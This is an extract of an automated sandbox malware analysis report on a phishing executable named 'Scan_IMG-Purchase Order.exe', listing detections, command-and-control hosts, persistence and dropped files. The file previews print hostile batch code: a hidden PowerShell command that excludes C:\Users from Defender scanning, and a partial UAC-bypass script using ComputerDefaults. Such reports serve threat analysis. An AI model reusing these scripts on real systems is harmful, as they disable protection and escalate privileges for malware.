0.3.Scan_IMG-Purchase Order.exe.2aa8008.74.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

17.2.Scan_IMG-Purchase Order.exe.660000.3.unpack 100% Avira TR/Crypt.Morphi Download File

ne.Gen

0.3.Scan_IMG-Purchase Order.exe.4d6e190.119.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.4d7f048.112.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d4784c.130.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.2a70620.37.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.2a7e138.76.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

18.3.Scxozm.exe.4ebefd0.193.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2aa6b80.62.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

0.3.Scan_IMG-Purchase Order.exe.4e446c0.321.unpack 100% Avira TR/Patched.Ren Download File

.Gen

35.2.Scxozm.exe.660000.2.unpack 100% Avira TR/Crypt.Morphi Download File

ne.Gen

22.3.Scxozm.exe.2ab92b4.7.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

0.3.Scan_IMG-Purchase Order.exe.4d77ef8.230.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.4c3fb78.133.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4e7a7f8.338.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d4ade4.187.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2aa0020.10.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.4c0e6a0.94.unpack 100% Avira TR/Patched.Ren Download File

.Gen

22.3.Scxozm.exe.2ad186c.45.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

22.3.Scxozm.exe.4d0448c.142.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d4f8a8.295.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.4e7d998.161.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4d4b9b4.204.unpack 100% Avira TR/Patched.Ren Download File

.Gen

18.3.Scxozm.exe.4e80bb8.180.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.4e45090.344.unpack 100% Avira TR/Patched.Ren Download File

.Gen

0.3.Scan_IMG-Purchase Order.exe.2abbc94.95.unpack 100% Avira TR/Crypt.XPAC Download File

K.Gen

Domains
Source Detection Scanner Label Link

morientlines.com 11% Virustotal Browse

URLs
Source Detection Scanner Label Link

0% Avira URL Cloud safe

https://morientlines.com/xerofileupshsgdydpdfseudidofndhehuplosdsdocumentghy/Scxozmyplhmqutylctx
lkglsugzstqx

Copyright Joe Security LLC 2022 Page 13 of 74

Source Detection Scanner Label Link

www.emerge.deDVarFileInfo$ 0% Avira URL Cloud safe

Domains and IPs

Contacted Domains
Name IP Active Malicious Antivirus Detection Reputation

mosesmanservernew.hopto.org 185.222.57.173 true true unknown

morientlines.com 103.11.189.121 true true 11%, Virustotal, Browse unknown

Contacted URLs
Name Malicious Antivirus Detection Reputation

true Avira URL Cloud: safe unknown

https://morientlines.com/xerofileupshsgdydpdfseudidofndhehuplosdsdocumentghy/Scxozmyplhmqut
ylctxlkglsugzstqx

URLs from Memory and Binaries

Name Source Malicious Antivirus Detection Reputation

www.emerge.deDVarFileInfo$ Scan_IMG-Purchase Order.exe, 00000000.00 false Avira URL Cloud: safe low
000000.250696523.0000000000486000.000000
02.00000001.01000000.00000003.sdmp, Scan_IMG-
Purchase Order.exe, 00000000.00000003.2607035
90.00000000048B0000.00000004.00001000.00
020000.00000000.sdmp, Scan_IMG-Purchase
Order.exe, 00000000.00000003.253187444.0
000000004900000.00000004.00001000.000200
00.00000000.sdmp, Scan_IMG-Purchase Order.exe,
00000000.00000003.251354432.000000007FD0000
0.00000004.00001000.00020000.00000000.sdmp

World Map of Contacted IPs

No. of IPs < 25%

25% < No. of IPs < 50%

50% < No. of IPs < 75%

75% < No. of IPs

Public IPs
IP Domain Country Flag ASN ASN Name Malicious

185.222.57.173 mosesmanservernew.hop Netherlands 51447 ROOTLAYERNETNL true

to.org

Copyright Joe Security LLC 2022 Page 14 of 74

IP Domain Country Flag ASN ASN Name Malicious

239.255.255.250 unknown Reserved unknown unknown false

103.11.189.121 morientlines.com Singapore 58621 VODIEN-AS-AP- true

LOC2VodienInternetSolutio
nsPteLtdSG

Private
IP

192.168.2.1

127.0.0.1

General Information
Joe Sandbox Version: 35.0.0 Citrine

Analysis ID: 672956

Start date and time: 25/07/202215:49:39 2022-07-25 15:49:39 +02:00

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 13m 3s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: Scan_IMG-Purchase Order.exe

Cookbook file name: default.jbs

Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211

Number of analysed new started processes 42

analysed:

Number of new started drivers analysed: 3

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabled

EGA enabled
HDC enabled
AMSI enabled

Analysis Mode: default

Analysis stop reason: Timeout

Detection: MAL

Classification: mal100.phis.troj.spyw.expl.evad.winEXE@22/19@4/5

EGA Information: Failed

HDC Information: Failed

HCA Information: Successful, ratio: 76%

Number of executed functions: 0
Number of non-executed functions: 0

Cookbook Comments: Found application associated with file extension: .exe

Adjust boot time
Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe,
wuapihost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (wh itelisted): 23.211.6.115, 20.189.173.22, 20.112.52.29, 20.81.111.85, 20.84.181.62, 20.103.85.33, 20.53.203.50
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-
microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.da
ta.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com
Execution Graph export aborted for target Scan_IMG-Purchase Order.exe, PID 1476 because th ere are no executed function
Not all processes where analyz ed, report is missing behavior information
Report creation exceeded maximum time and may have missing d isassembly code information.
Report size exceeded maximum c apacity and may have missing b ehavior information.
Report size getting too big, t oo many NtAllocateVirtualMemory calls found.
Report size getting too big, t oo many NtOpenKeyEx calls found.
Report size getting too big, t oo many NtProtectVirtualMemory calls found.
Report size getting too big, t oo many NtQueryValueKey calls found.

Copyright Joe Security LLC 2022 Page 15 of 74

Simulations

Behavior and APIs

Time Type Description

15:50:50 API Interceptor 2x Sleep call for process: Scan_IMG-Purchase Order.exe modified

15:51:17 Autostart Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Scxozm C:\Users\Public\Libraries\mzoxcS.url

15:51:26 Autostart Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Scxozm C:\Users\Public\Libraries\mzoxcS.url

15:51:28 API Interceptor 2x Sleep call for process: Scxozm.exe modified

15:52:05 API Interceptor 1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

⊘ No context

Domains

⊘ No context

ASNs

⊘ No context

JA3 Fingerprints

⊘ No context

Dropped Files

⊘ No context

Created / dropped Files

C:\Program Files\Microsoft DN1\rdpwrap.ini

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: ASCII text, with CRLF line terminators

Category: dropped

Size (bytes): 281633

Entropy (8bit): 5.444385942254397

Encrypted: false

SSDEEP: 768:gUiQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb5x8Rr/d6gl/+f8jZ0ftlFi4Q7Q3:wj33L+MAIiG4IvREWddadl/FD

MD5: 07D22A33EACF7D4250CD3256803B1361

SHA1: 41908A6C88B58943C3E3928AB699779AC940C5BF

SHA-256: 6543C4ED9934DCBD6A8869DF5432F10298FF7634AFF3A5DAF407D067CEC79CCB

SHA-512: C623CC0792EF9C2F83B25BF7F1D9F3524E51A3DC4830887B60B55753157CA8394A9763D302C6BBABCE8E302B56202F5DBC867EAEC6E7B67D2ED354E9F8AA4E
C3

Malicious: false

Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2022-07-02..LogFile=\rdpwrap.txt..SL
PolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnecti
onManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-A
llowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-
89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advan
ced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectio
nManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

Copyright Joe Security LLC 2022 Page 16 of 74

C:\Program Files\Microsoft DN1\sqlmap.dll

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Category: dropped

Size (bytes): 116736

Entropy (8bit): 5.884975745255681

Encrypted: false

SSDEEP: 3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT

MD5: 461ADE40B800AE80A40985594E1AC236

SHA1: B3892EEF846C044A2B0785D54A432B3E93A968C8

SHA-256: 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4

SHA-512: 421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A2
6

Malicious: true

Antivirus: Antivirus: Avira, Detection: 100%

Antivirus: Metadefender, Detection: 20%, Browse
Antivirus: ReversingLabs, Detection: 45%

Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!

O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................
................`...p............ ...............................text............................... ..`.rdata..<.... ......................@[email protected][email protected]..............................@[email protected]...........
....................@[email protected][email protected]..........................................................................................................................................................................................
......................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_159.exe_abfdf579450b8d0fec7425a8b3fe66ef4772d_b614c5c2_0e3516c1\Report.w

Process: C:\Windows\SysWOW64\WerFault.exe

File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators

Category: dropped

Size (bytes): 65536

Entropy (8bit): 0.7015288595986104

Encrypted: false

SSDEEP: 96:nSFtboqcGw1Ahpq7Ef6pXIQcQvc6QcEDMcw3Dr+HbHg/ced6XXrQlD6wZAXGng51:S31wrHBUZMXIjD/u7seS274Itu

MD5: 876404D90AC7E2019504C4678387BD0C

SHA1: 99FDE08272E3411AA62CB2183399E7E7B064BA4B

SHA-256: 562EAFBAAA7F7E9CEEA72650B340D4E93839882139F6B021051D6A35B642E424

SHA-512: FADF437D91DFA177EBC7732BD7F0A627CF734C03B7822C3C3874C74DAFA0111F5AECD4E7C2C19EF6AB3A87BB28E0098F177AA5029B20E1DE056EC660049876
C5

Malicious: false

Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.3.2.3.0.7.1.2.6.6.3.9.9.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.
o.a.d.T.i.m.e.=.1.3.3.0.3.2.3.0.7.1.9.1.1.3.9.0.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.a.0.b.a.a.0.-.0.4.5.6.-.4.2.7.6.-.b.6.b.2.-.0.8.c.2.0.
b.d.c.6.a.5.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.a.9.6.d.9.a.-.6.c.0.2.-.4.f.b.9.-.b.1.5.9.-.2.d.d.c.e.1.7.d.4.f.a.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.
4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.5.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.9.8.-.0.0.0.1.-.0.0.1.c.-.2.8.d.c.-.f.8.a.4.2.d.a.0.d.8.0.1.....T.a.r.g.e.t.
A.p.p.I.d.=.W.:.0.0.0.6.5.6.1.a.8.4.3.a.1.9.a.e.d.d.5.8.1.9.4.a.9.3.9.c.4.e.7.7.9.2.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.4.b.1.0.8.1.c.f.5.8.7.2.4.f.8.c.b.2.9.2.b.4.d.1.6.5.d.f.e.e.2.
f.b.1.c.9.f.6.!.1.5.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.0.2././.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE3F9.tmp.dmp

Process: C:\Windows\SysWOW64\WerFault.exe

File Type: Mini DuMP crash report, 14 streams, Mon Jul 25 13:51:54 2022, 0x1205a4 type

Category: dropped

Size (bytes): 42622

Entropy (8bit): 2.197875172873721

Encrypted: false

SSDEEP: 192:GGem5JWO2YiDGih2Dvy15MV48A5w3QcDhDoMhiPBG:X2fGDvy1q48Ai3QcV1h

MD5: 8EE0F8FFBEFD29FC941317D2DDE1310C

SHA1: 739225AA57E784185F0DD9DB1D97CF84695AF317

SHA-256: A3B9860A1015D691EF996D4C7BC76272DBBE71293FE171B4FCEA6836A9593D2F

SHA-512: 2FEF061CBA6C96601EC7AE2989E13DED9DE52F8772FF23F329BB2E7B353ED7CEA28978A7BEF57CC6C4A94B55DBC788029B2FF80247C97681F2B76A264A5B76
BB

Malicious: false

Preview: MDMP....... ..........b....................................D...............T.......8...........T..........................`...........L....................................................................U...........B..............GenuineInt

elW...........T.............b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e..............
.........................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4............................................................................................................................................
..............................................................................................................................................................................................................................................................................
...........................

Copyright Joe Security LLC 2022 Page 17 of 74

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDED.tmp.WERInternalMetadata.xml

Process: C:\Windows\SysWOW64\WerFault.exe

File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators

Category: dropped

Size (bytes): 8278

Entropy (8bit): 3.6960496358811095

Encrypted: false

SSDEEP: 192:Rrl7r3GLNiu86zu6YQ46pxgmfBSr+prR89b25sfYym:RrlsNid6zu6Y36PgmfBSh2Sfc

MD5: CB17E4D09F2D9AF2A6CEF66CFFC5ACBC

SHA1: 89832FDC1D5A1966A91BFBA04CC1A800B32C9440

SHA-256: 6B02EC1C83184778F8A0A8970E9D4605AAFA04BD206A5469D5992BE45E28C493

SHA-512: DED5F3F017B62CA05D0DAA67D78BD2B4F7E4409DEC431130B97569F7D00A74961E1475C39DDD893F7C43FA7AB81A001F0650836FBA0F939B4EEB0017D4B34E6
8

Malicious: false

Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.

o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.
<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.
0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.
X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.2.
8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF139.tmp.xml

Process: C:\Windows\SysWOW64\WerFault.exe

File Type: XML 1.0 document, ASCII text, with CRLF line terminators

Category: dropped

Size (bytes): 4514

Entropy (8bit): 4.418192059928549

Encrypted: false

SSDEEP: 48:cvIwSD8zsoAtJgtWI9aUWgc8sqYjC8fm8M4JkbFF+q80nRhDHdd:uITfoAHNNgrsqY7JIRRdHdd

MD5: D79EA964DE4829F003584DD04F787F5F

SHA1: 67BC13C7A82890047D99889826BD1252A8867027

SHA-256: 8BFBC6EC2C1BD1BE354E3B2E491E3923D286B146D53958C39DE784B0FA074450

SHA-512: 08947375346B8BEA9501E736637E7B7448B07786CD4497B3C3D6E753819137CD7A668F6702CC1CE055431826517594EA33D38C8BBF3A8DDD458CD002E37226A0

Malicious: false

Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10"
/>.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />..
<arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid"
val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1"
/>.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1618502" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-
11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\Public\Libraries\Cdex.bat

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: ASCII text, with no line terminators

Category: dropped

Size (bytes): 155

Entropy (8bit): 4.687076340713226

Encrypted: false

SSDEEP: 3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R

MD5: 213C60ADF1C9EF88DC3C9B2D579959D2

SHA1: E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021

SHA-256: 37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E

SHA-512: FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA56921
7B7

Malicious: false

Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

C:\Users\Public\Libraries\Null

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: ASCII text, with CRLF line terminators

Category: modified

Copyright Joe Security LLC 2022 Page 18 of 74

Size (bytes): 4

Entropy (8bit): 1.5

Encrypted: false

SSDEEP: 3:Nov:E

MD5: 714DFE7F469037958B8C2CBAC6CDB940

SHA1: 07A28019BA49041B81776FAC401B12A4404E4141

SHA-256: 412A8DA13330793D63A3A17BED32C76BE361EDAD27FE0F6A0CEB144D3F0AA50E

SHA-512: FB698653705D64243F0553D26E213E095ABA7332DFB60DEE931A488C7CA52963FA08C764B0D8DDA8EE7B32790BD7E658526A9495BA778467B9FF1BD120652D43

Malicious: false

Preview: 11..

C:\Users\Public\Libraries\Scxozm.exe

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: PE32 executable (GUI) Intel 80386, for MS Windows

Category: dropped

Size (bytes): 818176

Entropy (8bit): 7.040069666763753

Encrypted: false

SSDEEP: 24576:XWWH7k2z/m1uA7Zo4pdUtVSn52pAf2rDNtl2aCHXeO:XWrqMpd+Sn52KN5

MD5: C9EE1D6A90BE7524B01814F48B39B232

SHA1: 12C080569F9BF82E0C1538BC9CAEF4DE06DB5BFD

SHA-256: 6DA3064773EDF094F014B7AA13F2E3F74634F62552A91F88BF306F962BBF0563

SHA-512: A616FC149D7ED3ED199AAB73B68DA13DF0304C310D7AA85D8E5E8A14C37070835E1C5F04631C03C270B6FC803C469EE35350049B930D6F03F6A320FE02348AC
B

Malicious: true

Yara Hits: Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Scxozm.exe, Author: Joe Security

Antivirus: Antivirus: ReversingLabs, Detection: 38%

Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7..............................................................................................................

..........................PE..L....^B*..........................................@..............................................@...............................(...........................`...............................P..........................L...
.........................text...@........................... ..`.itext.............................. ..`.data............ ..................@....bss.....8...............................idata...(.......*[email protected]....@..
.........................rdata.......P......................@[email protected].......`[email protected]..............@..@.....................|..............@..@........................................................
........................................

C:\Users\Public\Libraries\Scxozm.exe:Zone.Identiﬁer

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: ASCII text, with CRLF line terminators

Category: dropped

Size (bytes): 26

Entropy (8bit): 3.95006375643621

Encrypted: false

SSDEEP: 3:ggPYV:rPYV

MD5: 187F488E27DB4AF347237FE461A079AD

SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64

SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64
E

Malicious: true

Preview: [ZoneTransfer]....ZoneId=0

C:\Users\Public\Libraries\ScxozmO.bat

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: ASCII text

Category: dropped

Size (bytes): 1102

Entropy (8bit): 5.392789817252277

Encrypted: false

SSDEEP: 24:oWRjvXo4P3TWMVxf9PjxVN5yV1vYFp85XwdtzgQprH83GTwIxIF:oWZvoaTWMVxpjxdyz48hwf8Qx83GTwsi

MD5: DF48C09F243EBCC8A165F77A1C2BF889

SHA1: 455F7DB0ADCC2A58D006F1630FB0BD55CD868C07

SHA-256: 4EF9821678DA07138C19405387F3FB95E409FBD461C7B8D847C05075FACD63CA

Copyright Joe Security LLC 2022 Page 19 of 74

SHA-512: 735838C7CCA953697DED48ADFCD037B7F198072A8962F5940CE12E1BB1C7DD8C1F257A829276F5F5456F776F5BD13342222DD6E0DFC8F18A23F464F2C8D8F1CC

Malicious: true

Yara Hits: Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
C:\Users\Public\Libraries\ScxozmO.bat, Author: Joe Security

Preview: .@echo off.set mypath=%cd%.if "%~1" equ "" (set saka=%mypath%\Cdex.bat) ELSE set "saka=%~1"...net session >nul 2>&1 || goto :label.%saka% .exit /b 2...:label.::
REQUIREMENTS.whoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1.if ERRORLEVEL 1 exit /b 1...::Windows Version.for /f "tokens=4-5 delims=. " %%i in ('ver') do
set WIN_VER=%%i.%%j...::aka Level.:: 2 High.:: 5 Default.:: 0 None.set key="HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System".for /f "skip=2 tok
ens=3" %%U in ('REG QUERY %key% /v ConsentPromptBehaviorAdmin') do set /a "aka=%%U"...::EXPLOIT.if %aka% equ 2 exit /b 1.if %aka% equ 5 (..for %%V in (6.1
6.2 6.3) do if "%WIN_VER%" == "%%V" call :exploit mscfile CompMgmtLauncher.exe %saka%..if "%WIN_VER%" == "10.0" call :exploit ms-settings ComputerDefaults.
exe %saka%.)>nul 2>&1.if %aka% equ 0 powershell -c Start-Process "%saka%" -Verb runas...exit /b 0...:exploit <key> <trigger> <saka>.set regPath="HKCU\Software\C
lasses\%1\shell\open\command".reg add %regPath% /d

C:\Users\Public\Libraries\Scxozmt.bat

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: ASCII text, with no line terminators

Category: dropped

Size (bytes): 55

Entropy (8bit): 4.474554204780528

Encrypted: false

SSDEEP: 3:LjTnaHF5pBMuo/6OR:rnaH1BMrR

MD5: AAC312AA000B880F5E42EE006186899F

SHA1: C1EBCCFB40EB4F47930F87373B153F5F23C97094

SHA-256: 7F98A4DDC25F81C381505F34BADA8FB5A3BC4F60A5AF86B7CDD9F64427299BF1

SHA-512: 28561398A8D1C6A96537EFFF6365AD9A235F930FC8810251D8A97AEEA55DC2EBDACBC9895CC0AACB408BE85E90526E63C822DF9972CBAA91210C60BE0543A0
7E

Malicious: false

Preview: start /min C:\Users\Public\Libraries\ScxozmO.bat & exit

C:\Users\Public\Libraries\mzoxcS.url

Process: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

File Type: MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Scxozm.exe">), ASCII text, with CRLF line terminators

Category: dropped

Size (bytes): 98

Entropy (8bit): 4.946107359700191

Encrypted: false

SSDEEP: 3:HRAbABGQYmTWAX+rSF55i0XMvKFbsGKd5lPgvn:HRYFVmTWDyzPbsb5lPqn

MD5: 6C86658D6A33C010F28F5F1EF58A5B7D

SHA1: E162D7ECE39AFC90711768FBCB695A308364E0E9

SHA-256: C97D3AD38553ACE981F4C6A237A2548A6B518BCFA713AD3BAC70092BC5DF5C59

SHA-512: B8AA021DE758FFD1B216F114515DF717E94B250E6D1A9B3CC261C71B1ACA2C9366C66C3478606436AEFF5B3AF4D28EF3809C0C3A01833080D54270A280D28FF4

Malicious: false

Yara Hits: Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\mzoxcS.url, Author:
@itsreallynick (Nick Carr)
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
C:\Users\Public\Libraries\mzoxcS.url, Author: @itsreallynick (Nick Carr)

Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Scxozm.exe"..IconIndex=10..HotKey=11..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Scxozmyplhmqutylctxlkglsugzstqx[1]

Process: C:\Users\Public\Libraries\Scxozm.exe

File Type: data

Category: dropped

Size (bytes): 374272

Entropy (8bit): 7.591779868830508

Encrypted: false

SSDEEP: 6144:b4AP3DUNDyuTUze97nNhmOtgDQBCu3StMGP3KtUmpOypRavJLcBTZIqysbd3WKgy:bfzO0z7ygcMwRgQBTZbBbd3WT6ptDJYq

MD5: 1D6F69EA73F2FB295552EB8F608B5675

SHA1: D19B3E3A514D5754AA554747D19337207E0EE097

SHA-256: 6952DDE712DFCE0F1049AFF27CE9B8E68451672DA9DD7702201EA1D633E2B633

SHA-512: 9A60767CE2E045525B55710461496CFC03D9F7B2DB18E8D5ABAEBF0771E70759371DDEA50754E09B8D2780A6DAD1845624F356E86552508A685BEA252CED19C2

Malicious: false

Copyright Joe Security LLC 2022 Page 20 of 74

